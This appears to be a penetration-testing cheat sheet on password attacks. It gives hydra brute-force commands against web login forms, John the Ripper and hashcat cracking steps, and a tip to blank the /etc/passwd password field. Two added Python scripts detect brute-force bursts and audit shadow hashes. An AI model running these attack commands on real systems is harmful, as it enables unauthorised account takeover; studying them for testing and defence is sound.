🔐Password Attacks

Username Custom Wordlist

A username list can be generated with username-anarchy from a file of full names, in the naming formats the target is likely to use:

ruby username-anarchy/username-anarchy -i username.txt -f flast,f.last,first.last,last.first

Bruteforcing WebApps

When a website login needs to be brute-forced, first use cewl to build a site-specific wordlist (here with a minimum word length of 5):

cewl http://postfish.off/team.html -m 5 -w team.txt

Then use it with hydra.

Normal:

hydra -l user -P /usr/share/wordlists/rockyou.txt <target-ip> http-post-form "/index.php:fm_usr=user&fm_pwd=^PASS^:Login failed. Invalid"

Here "Login failed. Invalid" is the failure string hydra looks for in the response to know that an attempt was not successful.

fm_usr is the username parameter and fm_pwd the password parameter; ^PASS^ is replaced by each wordlist entry in turn.

Base64-encoded credentials (^USER64^ and ^PASS64^ are substituted as base64):

hydra -I -f -L custom-wordlist.txt -P custom-wordlist.txt 'http-post-form://192.168.227.61:8081/:username=^USER64^&password=^PASS64^'
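The server-side counterpart of the hydra http-post-form runs above, as an added example that is not part of the original page: it parses constructed Apache combined-format access log lines and flags any source that POSTs to the login endpoint more than a threshold number of times inside a sliding window. The endpoint path (/index.php, from the hydra example), the one-minute window and the threshold of 10 are assumptions of this example; status codes are deliberately ignored because a failure-string check like the one above means every attempt can come back as HTTP 200.

```python
# Added example, not from the original page: the server-side view of the
# http-post-form brute force above. It parses constructed Apache combined-format
# log lines and flags source IPs that POST to the login endpoint THRESHOLD or
# more times within a sliding WINDOW. Endpoint, window and threshold are
# assumptions of this example, not values from the page.

import re
from collections import defaultdict
from datetime import datetime, timedelta

LOGIN_PATH = "/index.php"       # assumed: the page's hydra example posts here
WINDOW = timedelta(minutes=1)   # assumed sliding window
THRESHOLD = 10                  # assumed POSTs per window per source before alerting

# Apache combined format up to the status code; the rest of the line is ignored.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Return (ip, timestamp, method, path-without-query, status) or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["method"], m["path"].split("?", 1)[0], int(m["status"])


def find_bruteforce_sources(lines, path=LOGIN_PATH, window=WINDOW, threshold=THRESHOLD):
    """Return {ip: peak_count} for sources whose POSTs to `path` reach
    `threshold` within any `window`-long span. Status codes are ignored on
    purpose: with a failure-string check every attempt can return 200."""
    posts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec[2] == "POST" and rec[3] == path:
            posts[rec[0]].append(rec[1])

    alerts = {}
    for ip, times in posts.items():
        times.sort()
        start, peak = 0, 0
        for end, t in enumerate(times):
            while t - times[start] > window:   # slide the window forward
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts[ip] = peak
    return alerts


def _constructed_log():
    """Build sample log lines (constructed, not real traffic): 12 rapid POSTs
    from one source, 2 slow ones from another, and an unrelated GET."""
    base = datetime(2024, 1, 15, 10, 0, 0)
    fmt = '{ip} - - [{ts} +0000] "{method} {path} HTTP/1.1" 200 512 "-" "Mozilla/5.0"'

    def line(ip, offset, method="POST", path=LOGIN_PATH):
        ts = (base + timedelta(seconds=offset)).strftime("%d/%b/%Y:%H:%M:%S")
        return fmt.format(ip=ip, ts=ts, method=method, path=path)

    lines = [line("198.51.100.7", 2 * i) for i in range(12)]
    lines += [line("203.0.113.5", 5), line("203.0.113.5", 40)]
    lines.append(line("203.0.113.5", 50, method="GET", path="/team.html"))
    return lines


SAMPLE_LOG = _constructed_log()

if __name__ == "__main__":
    for ip, n in find_bruteforce_sources(SAMPLE_LOG).items():
        print(f"possible brute force from {ip}: {n} POSTs to {LOGIN_PATH} within {WINDOW}")
```

Run as a script it reports the single noisy source; pass your own access log lines to find_bruteforce_sources and adjust path, window and threshold to the application. Rate limiting or account lockout on the login endpoint removes most of the value of the hydra run in the first place.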

JohnTheRipper

To crack a hash (add --wordlist=<file> to supply a wordlist; without it john falls back to its default cracking modes):

john --format=sha256 hashes_to_crack.txt

Helper scripts that convert files into a hash format John can crack:

Tool                    Description
pdf2john                Converts PDF documents for John
ssh2john                Converts SSH private keys for John
mscash2john             Converts MS Cash hashes for John
keychain2john           Converts OS X keychain files for John
rar2john                Converts RAR archives for John
pfx2john                Converts PKCS#12 files for John
truecrypt_volume2john   Converts TrueCrypt volumes for John
keepass2john            Converts KeePass databases for John
vncpcap2john            Converts VNC PCAP files for John
putty2john              Converts PuTTY private keys for John
zip2john                Converts ZIP archives for John
hccap2john              Converts WPA/WPA2 handshake captures for John
office2john             Converts MS Office documents for John
wpa2john                Converts WPA/WPA2 handshakes for John

To mutate a password list with hashcat rules (every rule in custom.rule is applied to every entry; sort -u removes the duplicates):

hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list

If the /etc/passwd file is writable, delete the "x" (the password-field placeholder) from it.

Algorithm Types (crypt(3) hash prefixes as seen in /etc/shadow)

  • $1$ – MD5

  • $2a$ – Blowfish

  • $2y$ – Eksblowfish

  • $5$ – SHA-256

  • $6$ – SHA-512
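The prefix table above, and the empty-password-field case from the /etc/passwd note, turned into a small audit routine. This is an added example, not code from the original page: it recognises only the five prefixes listed on the page (anything else, such as newer yescrypt entries, is reported as unrecognised), treats MD5-crypt as the weak algorithm to flag (an assumption of this example), and runs against constructed shadow-style entries whose hash bodies are placeholders.

```python
# Added example, not from the original page: classify the crypt(3)-style hash
# prefixes listed above and audit shadow-style entries for the two things a
# defender cares about here: empty password fields (the "deleted x" case) and
# weak hash algorithms. Only the five prefixes from the page are recognised;
# the sample entries are constructed, not real credentials.

from dataclasses import dataclass
from typing import List, Optional

# Prefix -> algorithm, exactly as listed on the page.
CRYPT_PREFIXES = {
    "$1$": "MD5",
    "$2a$": "Blowfish",
    "$2y$": "Eksblowfish",
    "$5$": "SHA-256",
    "$6$": "SHA-512",
}

# Assumption of this example: MD5-crypt is the one to flag as weak.
WEAK_ALGORITHMS = {"MD5"}


def identify_hash(field: str) -> Optional[str]:
    """Return the algorithm name for a crypt(3) hash field, or None if unknown."""
    for prefix, algo in CRYPT_PREFIXES.items():
        if field.startswith(prefix):
            return algo
    return None


@dataclass
class Finding:
    user: str
    algorithm: Optional[str]   # None when no hash is present or recognised
    issue: Optional[str]       # None when the entry looks fine


def audit_entry(line: str) -> Finding:
    """Audit one shadow-style line of the form user:password-field:..."""
    user, field = line.split(":", 2)[:2]
    if field == "":
        return Finding(user, None, "empty password field: account logs in without a password")
    if field.startswith(("!", "*")):
        return Finding(user, None, None)   # locked, or password login disabled
    algo = identify_hash(field)
    if algo is None:
        return Finding(user, None, "unrecognised hash format")
    if algo in WEAK_ALGORITHMS:
        return Finding(user, algo, f"weak hash algorithm: {algo}")
    return Finding(user, algo, None)


def audit_shadow(text: str) -> List[Finding]:
    """Audit every non-blank line of a shadow-style file."""
    return [audit_entry(line) for line in text.splitlines() if line.strip()]


# Constructed sample; the hash bodies are placeholders, not real hashes.
SAMPLE_SHADOW = """\
root:$6$saltsalt$PLACEHOLDERHASH:19000:0:99999:7:::
legacy:$1$saltsalt$PLACEHOLDERHASH:19000:0:99999:7:::
svc:!:19000:0:99999:7:::
guest::19000:0:99999:7:::
app:$2y$10$PLACEHOLDERSALTANDHASH:19000:0:99999:7:::
"""

if __name__ == "__main__":
    for f in audit_shadow(SAMPLE_SHADOW):
        print(f"{f.user:8} {f.algorithm or '-':12} {f.issue or 'ok'}")
```

On the sample, "legacy" is flagged for MD5-crypt and "guest" for an empty password field; "svc" is locked and passes. Run it over a real /etc/shadow (as root) to spot accounts that would accept an empty password or that still carry a hash type worth migrating.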
